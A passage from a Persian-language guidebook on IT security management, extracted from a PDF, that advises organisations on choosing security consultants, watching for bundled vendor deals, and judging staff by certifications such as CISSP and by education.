‫ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻠﻲ ﻭ ﻣﺤﻠﻲ؛‬
‫•‬
‫ﻣﺤﺼﻮﻻﺕ‪ ،‬ﻓﻨﺎﻭﺭﻳﻬﺎ ﻭ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ؛‬
‫•‬
‫ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﻛﺮﻣﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺳﺎﻳﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨـﺮﺏ‪،‬‬
‫ﻭ ﻫﻤﭽﻨﻴﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﻮﻳﻨﺪﻩ‪١٠٤‬؛‬
‫•‬
‫ﻲ ﻣﺠــﺎﺯﻱ‬
‫ﺍﺻــﻮﻝ ‪ TCP/IP‬ﺩﺭ ﺷــﺒﻜﻪﻫــﺎﻱ ﺧــﺼﻮﺻ ﹺ‬
‫)‪(VPNs‬‬
‫‪١٠٥‬‬
‫ﻭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ؛‬
‫•‬
‫ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﻋﻤﻮﻣﻲ‪ ،‬ﺭﺍﻫﻨﻤﺎﻫﺎ ﻭ ﺧﺪﻣﺎﺕ؛‬
‫•‬
‫ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎ ﻭ ﭘﻴﮕﺮﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ؛‬
‫•‬
‫ﺍﻣﻨﻴﺖ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ؛ ﻭ‬
‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪ ،‬ﺭﻭﺷﻬﺎﻱ ﺭﺳﻤﻲ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ‪ ،‬ﻭ‬
‫ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻮﺭ ﺑﻴﻤﻪ‪.‬‬
‫•‬
‫ﻫﺮ ﺷﺮﻛﺖ ﺧﺪﻣﺎﺕ ﻣﺸﺎﻭﺭﻩ ﺍﻱ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺧـﻮﺑﻲ‬
‫ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺗﻬﻴﻪ ﻛﻨﺪ ﺑﺎﻳﺪ ﭘﺮﺳـﻨﻠﻲ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﺪ ﻛﻪ ﻃﺎﻟﺐ ﮔﻔﺘﮕﻮ ﺩﺭﺑﺎﺭﺓ ﻣﺒﺎﺣﺚ ﻣﺨﺘﻠﻒ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ‬
‫ﻭ ﺑﻮﻳﮋﻩ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺁﻥ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﺑﺎﺷﻨﺪ‪ .‬ﺍﮔﺮ ﺁﻧﻬﺎ ﺁﻣﺎﺩﻩ ﻭ‬
‫ﻳﺎ ﻗﺎﺩﺭ ﺑﻪ ﺑﺤﺚ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳـﻦ ﻋﻨـﺎﻭﻳﻦ ﻧﺒﺎﺷـﻨﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺍﻧﺘﺨﺎﺏ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻧﺒﺎﺷﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﻧﮕﺮﺍﻧﻲ ﺧﺎﺻﻲ ﺩﺍﺭﻳﺪ ﻛﺎﻓﻴﺴﺖ ﺍﺯ ﺁﻧﻬﺎ‬
‫ﺑﺨﻮﺍﻫﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻳﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﻳﻚ ﻣﺸﺘﺮﻱ ﺩﻳﮕـﺮ‬
‫ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ ﺷـﺮﻛﺘﻬﺎ‬
‫ﭼﻨﻴﻦ ﺳﻨﺪﻱ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﺣﺬﻑ ﺍﺳﻢ ﻭ ﻣﺸﺨﺼﺎﺕ ﻣﺸﺘﺮﻱ ﺑﻪ ﺷﻤﺎ‬
‫ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺳﺎﻳﺮ ﺷﺮﻛﺘﻬﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣـﺸﺘﺮﻳﻬﺎﻳﻲ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻨﺪ ﻛﻪ ﺧﻮﺩﺷﺎﻥ ﺧﻮﺍﺳﺘﻪ ﺑﺎﺷﻨﺪ ﺩﺭ ﻓﻬﺮﺳﺖ "ﻣﺸﺘﺮﻳﺎﻥ ﻣﺮﺟﻊ"‬
‫ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ .‬ﺑﻌﻀﻲ ﺷـﺮﻛﺘﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﭘـﻴﺶ ﺍﺯ ﺍﺭﺍﺋـﻪ ﻫـﺮ‬
‫ﺍﻃﻼﻋـــﺎﺗﻲ ﺍﺯ ﺷـــﻤﺎ ﺑﺨﻮﺍﻫﻨـــﺪ ﻣﻮﺍﻓﻘﺘﻨﺎﻣـــﻪﺍﻱ ﺩﺍﻝ ﺑـــﺮ‬
‫ﺳﺮﻱ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﺳﻨﺎﺩ ﺍﻣﻀﺎ ﻛﻨﻴﺪ‪ .‬ﺍﺯ ﺧﺪﻣﺎﺕ ﺷـﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ‬
‫ﺍﺳﻢ ﻭ ﺍﺳﻨﺎﺩ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﺪﻭﻥ ﻣﺠﻮﺯ ﺁﻧﻬﺎ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻭ‬
‫ﺩﻳﮕﺮﺍﻥ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ؛ ﭼﻮﻥ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺷﻤﺎ ﻧﻴﺰ ﺑﺪﻭﻥ ﻣﺠـﻮﺯ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﻌـﺪﻱ‬
‫ﺧﻮﺩ ﻗﺮﺍﺭ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺩ‪ .‬ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺍﮔﺮ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺧـﺎﺭﺝ‬
‫‪104 Scanning Software‬‬
‫‪105 Virtual Private Networks‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﻣﺮﺍﻗﺐ ﻓﺮﻳﺒﻜﺎﺭﻳﻬﺎ ﺑﺎﺷﻴﺪ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻫﻤﻪﺟﺎﻧﺒﻪ ﻛﻪ ﺩﺭ ﺁﻥ ﻳـﻚ ﺷـﺮﻛﺖ ﺑـﻪ‬
‫ﺗﻨﻬﺎﻳﻲ ﻫﻤـﺔ ﺳﻴﺎﺳـﺘﻬﺎ ﺭﺍ ﺗﻬﻴـﻪ ﻧﻤـﻮﺩﻩ ﻭ ﺑـﺮﺍﻱ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﺳﻴﺎﺳﺘﻬﺎ‪ ،‬ﺧﺪﻣﺎﺕ ﻭ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻻﺯﻡ ﺭﺍ ﻧﻴﺰ ﻣﻲﻓﺮﻭﺷـﺪ ﻣﺮﺍﻗـﺐ‬
‫ﺑﺎﺷﻴﺪ‪ .‬ﻣﺎ ﮔﺰﺍﺭﺷـﺎﺗﻲ ﺩﺭﻳﺎﻓـﺖ ﻛـﺮﺩﻩﺍﻳـﻢ ﻛـﻪ ﺩﺭ ﺁﻥ ﻧﻴﺎﺯﻫـﺎﻱ‬
‫ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﻭ ﻧﻴﺎﺯﻫﺎﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻃﺮﺯ ﻣﺸﻜﻮﻛﻲ ﺑﺮﺍﻱ‬
‫ﻫﻤﺔ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﺴﻴﺎﺭ ﻣـﺸﺎﺑﻪ ﻳﻜـﺪﻳﮕﺮ ﺑـﻮﺩﻩ ﻭ ﺩﺭ ﻫﻤﮕـﻲ ﺍﺯ‬
‫ﻱ ﻧﺴﺒﺘﹰﺎ ﻣﺸﺎﺑﻬﻲ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺳﺨﺖ ﺍﻓﺰﺍﺭ ﭘﺎﻳﻪ ﻭ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻣﺸﺎﻭﺭﻩﺍ ﹺ‬
‫ﺷﺪﻩ ﺑﻮﺩ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﺷﺮﻛﺘﻲ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﻛﻪ ﺷﻤﺎ ﺭﺍ ﻣﺤـﺪﻭﺩ‬
‫ﺑﻪ ﺍﺭﺗﺒﺎﻁ ﺍﻧﺤﺼﺎﺭﻱ ﺑﻠﻨﺪﻣـﺪﺕ ﺑـﺎ ﺧـﻮﺩ ﻧﻜﻨـﺪ‪ ،‬ﺁﻧﮕـﺎﻩ ﺍﺣﺘﻤـﺎﻝ‬
‫ﺑﻴﺸﺘﺮﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺗﺪﻭﻳﻦﺷﺪﻩ ﺗﻮﺳـﻂ‬
‫ﺁﻥ ﺳﺎﺯﻣﺎﻥ ﻣﻄﺎﺑﻖ ﻧﻴﺎﺯﻫﺎﻱ ﻭﺍﻗﻌـﻲ ﺷـﻤﺎ ﺑﺎﺷـﺪ ﻭ ﻧـﻪ ﻣﻄـﺎﺑﻖ‬
‫ﻭﺳﺎﻳﻠﻲ ﻛﻪ ﺁﻧﻬﺎ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﺎﻧﻨﺪ‪.‬‬
‫‪١٠٣‬‬
‫•‬
‫ﻗﺎﻧﻮﻥ ﻛﺎﺭ ﻭ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺴﺎﺋﻞ ﻣﺪﻳﺮﻳﺘﻲ ﻛـﻪ ﺷـﺮﺍﻳﻄﻲ ﺭﺍ‬
‫ﭘﻴﺶ ﺑﻴﻨﻲ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬـﺎ ﺍﻓـﺮﺍﺩ ﺩﺍﺧﻠـﻲ ﺑـﺮ ﻋﻠﻴـﻪ‬
‫ﻛﺎﺭﻓﺮﻣﺎﻳﺸﺎﻥ ﺍﻗﺪﺍﻡ ﻗﺎﻧﻮﻧﻲ ﻣﻲﻛﻨﻨﺪ؛‬
‫‪١٧٠‬‬
‫ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻳﺎ ﻳﻚ ﻛﺸﻮﺭ ﺩﻳﮕﺮ ﻛﻤﻚ ﮔﺮﻓﺘﻴﺪ‪ ،‬ﻓﺮﺍﻣـﻮﺵ ﻧﻜﻨﻴـﺪ‬
‫ﻛﻪ ﻳﻜﻲ ﺍﺯ ﺷﺮﺍﻳﻂ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺎﻳﺪ ﺍﻳﻦ ﺑﺎﺷﺪ ﻛـﻪ ﺁﻧﻬـﺎ ﺑـﻪ ﺗﻮﺳـﻌﺔ‬
‫ﻇﺮﻓﻴﺖ ﻣﺤﻠﻲ ﺳﺎﺯﻣﺎﻥ ﻭ ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﻛﺸﻮﺭ ﺷـﻤﺎ ﻛﻤـﻚ‬
‫ﻛﻨﻨﺪ‪.‬‬
‫ﻼ ﻃﺒﻴﻌﻲ ﺍﺳﺖ ﻛﻪ ﻃﻲ ﺩﻭﺭﻩﻫﺎﻱ ﮔﺬﺍﺭ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﺍﻳﻦ ﻛﺎﻣ ﹰ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺷﺮﻛﺘﻬﺎ ﺍﺯ ﻛﻤﻚ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ ﺧـﺎﺭﺟﻲ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺣﺎﻟﺖ ﺍﻳﺪﻩﺁﻝ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳـﻦ ﺭﻭﺍﺑـﻂ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ‬
‫ﺩﺍﻧﺶ ﻭ ﻓﻨـﺎﻭﺭﻱ ﻭ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺘﻌﺪﺍﺩﻫﺎﻱ ﺑـﻮﻣﻲ ﻭ ﺩﺭﺻـﻮﺭﺕ‬
‫ﺍﻣﻜﺎﻥ ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﻣﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫ﻣﻌﻴﺎﺭﻫﺎﻱ ﺷﺎﻳﺴﺘﮕﻲ‬
‫ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﻬﻤﺘــﺮ ﺍﺯ ﻫﻤــﻪ ﺑﺎﻳــﺪ ﺩﺭ ﻓﻜــﺮ ﺍﻓــﺮﺍﺩﻱ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺧــﺪﻣﺎﺕ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻧﺮﺍ ﺑﻪ ﺷﻤﺎ ﺍﺭﺍﺋﻪ ﻣـﻲﺩﻫﻨـﺪ‪.‬‬
‫ﺑﺮ ﺧﻼﻑ ﺳﺎﻳﺮ ﺧﺪﻣﺎﺕ ﻣﺸﺎﻭﺭﻩﺍﻱ‪ ،‬ﺩﺭ ﺧﺼﻮﺹ ﻣﺸﺎﻭﺭﻳﻨﻲ ﻛـﻪ‬
‫ﺑﺮﺍﻱ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﺍﺳـﺘﺨﺪﺍﻡ ﺩﺭ ﺁﻣـﺪﻩﺍﻧـﺪ ﺑﺎﻳـﺪ ﺑـﺴﻴﺎﺭ‬
‫ﻣﺤﺘﺎﻃﺎﻧﻪ ﺭﻓﺘﺎﺭ ﻛﻨﻴﺪ؛ ﭼﺮﺍﻛﻪ ﺑﻜﺎﺭﮔﻴﺮﻱ ﻧﻴﺮﻭﻱ ﺧـﺎﺭﺟﻲ ﺑـﺮﺍﻱ‬
‫ﻻ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﺳـﻄﻮﺣﻲ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﻪ ﺳﻴﺴﺘﻢ ﻭ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺁﻧﻬﺎ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﺪ‪.‬‬
‫ﻼ ﺍﺷﺎﺭﻩ ﻛﺮﺩﻳﻢ ﺩﺭ ﺍﻃﺮﺍﻑ ﻣﺎ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﻣﺎﻫ ﹺﺮ‬
‫ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﻗﺒ ﹰ‬
‫ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺷـﻤﺎ‬
‫ﺑﺎﻳﺪ ﺍﻓﺮﺍﺩﻱ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻳﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺁﻧﻬﺎ ﺑـﻪ ﺍﻧـﺪﺍﺯﻩﺍﻱ ﻛـﻪ‬
‫ﻣﻲﺧﻮﺍﻫﻴﺪ ﺟﺎﻣﻊ ﻧﻴﺴﺖ‪ ،‬ﻭﻟﻲ ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﺯ ﻋﻬـﺪﺓ ﻛﺎﺭﺗـﺎﻥ ﺑـﺮ‬
‫ﻣﻲﺁﻳﻨﺪ‪ .‬ﺩﺭ ﻣﻮﺭﺩ ﻛﺴﺎﻧﻴﻜﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺗﺨـﺼﺺ ﺧـﻮﺩ ﺍﺩﻋﺎﻫـﺎﻱ‬
‫ﺩﺭﻭﻏﻴﻦ ﻣﻲﻛﻨﻨﺪ ﻳﺎ ﺁﻧﻬﺎ ﻛﻪ ﺗﺨﺼﺼﺸﺎﻥ ﺑـﻪ ﺁﻧﭽـﻪ ﺑـﺪﺍﻥ ﻧﻴـﺎﺯ‬
‫ﺩﺍﺭﻳﺪ ﻧﺎﻣﺮﺑﻮﻁ ﺍﺳﺖ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ‪ .‬ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﺯ ﺧﺪﻣﺎﺕ ﻓﺮﺩ ﻳﺎ‬
‫ﺷﺮﻛﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺧﻮﺩ ﺍﻋﺘﺮﺍﻑ ﻣﻲﻛﻨﻨﺪ "ﺩﺭ ﺧﻼﻝ ﻛـﺎﺭ‪،‬‬
‫ﻻ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻭﺟﻪ ﻛﻤﺘـﺮﻱ‬
‫ﻳﺎﺩﮔﻴﺮﻱ ﻫﻢ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ" )ﻭ ﺍﺣﺘﻤﺎ ﹰ‬
‫ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ(‪ ،‬ﺗﺎ ﺍﻳﻨﻜـﻪ ﻓـﺮﺩﻱ ﺍﺳـﺘﺨﺪﺍﻡ ﻛﻨﻴـﺪ ﻛـﻪ ﺗـﻼﺵ‬
‫ﻣﻲﻛﻨﺪ ﻧﻘﺎﻳﺺ ﻛﺎﺭ ﺧﻮﺩ ﺭﺍ ﭘﻨﻬﺎﻥ ﻛﻨﺪ‪.‬‬
‫ﺑﺎﺯﺍﺭﻫﺎﻱ ﺍﻣﺮﻭﺯﻱ ﺍﻣﻨﻴﺖ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘـﻪ ﺍﺯ ﺍﻓـﺮﺍﺩﻱ‬
‫ﻛﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻳﻤﻦ ﻛـﺮﺩﻥ ﺑـﺴﺘﺮﻫﺎﻱ ‪ Windows‬ﺩﺭ ﺳـﻄﻮﺡ‬
‫ﻣﺨﺘﻠﻒ ﺗﺨﺼﺺ ﺩﺍﺭﻧـﺪ ﺍﺷـﺒﺎﻉ ﺷـﺪﻩ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ‬
‫ﺑﺴﺘﺮﻫﺎﻱ ﺩﻳﮕﺮ ﺍﺯ ﺟﻤﻠﻪ ‪ Unix‬ﻛﻤﺘﺮ ﻫﺴﺘﻨﺪ‪ .‬ﺍﺯ ﻛﺘﺎﺑﻬﺎ ﻣﻲﺗﻮﺍﻥ‬
‫ﺍﻃﻼﻋﺎﺕ ﺯﻳﺎﺩﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺁﻣﻮﺧﺖ‪ ،‬ﺍﻣﺎ ﺗﻨﻬﺎ ﻣﻄﺎﻟﻌﺔ ﻛﺘﺎﺏ‬
‫ﻛﺎﻓﻲ ﻧﻴﺴﺖ‪ .‬ﺩﺭ ﺣﻮﺯﻩﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﻣـﻮﺭﺩ ﺁﻧﻬـﺎ ﻧﮕﺮﺍﻧـﻲ ﺩﺍﺭﻳـﺪ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﺪﻧﺒﺎﻝ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺷﺎﻳﺴﺘﮕﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑﺎﺷﻴﺪ؛ ﺑﺨﺼﻮﺹ‪:‬‬
‫ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎ‬
‫ﺍﺯ ﻣﺘﻘﺎﺿﻴﺎﻥ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﺑﺨﻮﺍﻫﻴﺪ ﻭ ﺍﺯ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ‬
‫ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎ ﻗﺎﺑﻞ‬
‫ﺧﺮﻳﺪ ﻫﺴﺘﻨﺪ ﻭ ﻓﺮﺩ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﺁﻧﻬﺎ ﻛﺎﻓﻴﺴﺖ ﺩﺭ ﻳﻜـﺴﺮﻱ ﺍﺯ‬
‫ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻳـﺎ ﻛﻼﺳـﻬﺎﻱ ﺁﻣﻮﺯﺷـﻲ ﺷـﺮﻛﺖ ﻛﻨـﺪ‪،‬‬
‫ﻣﻄﺎﻟﺐ ﺗﺌﻮﺭﻱ ﺭﺍ ﺑﺮﺍﻱ ﭼﻨﺪ ﺳﺎﻋﺖ ﺑﻪ ﺧﺎﻃﺮ ﺑﺴﭙﺎﺭﺩ‪ ،‬ﻭ ﺳﺆﺍﻻﺕ‬
‫ﺗﺴﺘﻲ ﺭﺍ ﭘﺎﺳﺦ ﺩﻫﺪ‪ .‬ﺍﻳﻦ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎ ﭼﻨﺪﺍﻥ ﺍﺭﺯﺷﻤﻨﺪ ﻧﻴـﺴﺘﻨﺪ‪.‬‬
‫ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎﻱ ﺩﻳﮕﺮﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻧﻴﺎﺯﻣﻨﺪ ﺗﺠﺎﺭﺏ ﻋﻤﻠﻲ ﻭ‬
‫ﺗﺨﺼﺺ ﻋﻤﻴﻘﺘﺮ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬
‫ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻫﻨﻮﺯ ﻳﻚ ﺑﺤﺚ ﺩﺭﺣﺎﻝ ﺗﻜﺎﻣﻞ ﺍﺳﺖ ﻭ ﻟـﺬﺍ ﺍﺯ ﺍﺷـﺎﺭﻩ‬
‫ﺑﻪ ﻧﻤﻮﻧﻪﻫﺎﻱ ﻓﻌﻠﻲ ﺁﻥ ﺍﻛﺮﺍﻩ ﺩﺍﺭﻳﻢ‪ ،‬ﺍﻣﺎ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣـﻲﺗـﻮﺍﻥ‬
‫ﺑﻪ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ‪ ١٠٦CISSP‬ﺍﺷـﺎﺭﻩ ﻛـﺮﺩ ﻛـﻪ ﻫﺮﭼﻨـﺪ ﻫﻤـﺔ ﺁﻥ‬
‫ﭼﻴﺰﻱ ﻧﻴﺴﺖ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﻢ‪ ،‬ﺍﻣﺎ ﻳﻚ ﻣﺪﺭﻙ ﻣﻌﺘﺒـﺮ‬
‫ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺳﻄﺤﻲ ﻣﻌﻴﻦ ﺍﺯ ﺗﺠﺮﺑﻪ ﻭ ﺗﺨﺼﺺ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ‬
‫‪١٠٧‬‬
‫ﺍﺳﺖ‪.‬‬
‫ﺗﺤﺼﻴﻼﺕ‬
‫ﺳﻮﺍﺑﻖ ﺗﺤﺼﻴﻠﻲ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪ .‬ﺑﺮﺧﻲ ﺍﻓـﺮﺍﺩ ﻣﻬـﺎﺭﺕ ﺑـﺎﻻﻱ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻧﺘﻴﺠﺔ ﻣﻄﺎﻟﻌـﻪ ﻭ ﺗﺠﺮﺑـﺔ ﺷﺨـﺼﻲ ﺑﺪﺳـﺖ‬
‫ﺁﻭﺭﺩﻩﺍﻧﺪ ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺩﺭﺑﺎﺭﺓ ﻋﻠﻮﻡ ﻭ ﻣﻬﻨﺪﺳﻲ ﺭﺍﻳﺎﻧـﻪ ﻣـﺪﺍﺭﻙ‬
‫ﺗﺤﺼﻴﻠﻲ ﻭ ﺩﺍﻧﺸﻜﺪﻩﺍﻱ ﺩﺍﺭﻧﺪ؛ ﺍﻣﺎ ﺑﺎﻭﺭ ﺟﻬﺎﻧﻲ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺳﻄﺢ ﻣﻬﺎﺭﺕ ﻣﻬﻤﺘﺮ ﺍﺯ ﻣﺪﺍﺭﻙ ﺍﺳﺖ‪ .‬ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﺩﺭ ﺑﺨـﺶ‬
‫ﻛﺎﺭﻛﻨﺎﻥ ﺍﺷﺎﺭﻩ ﻛﺮﺩﻳﻢ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﺍﺩﻋﺎﻫﺎﻱ ﻣﺘﻘﺎﺿـﻴﺎﻥ‬
‫ﺑﺎ ﻣﺪﺍﺭﻛﺸﺎﻥ ﻣﻄﺎﺑﻘﺖ ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ‪ .‬ﺳﺎﺯﻣﺎﻥ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﺍﻳـﺎﻻﺕ‬
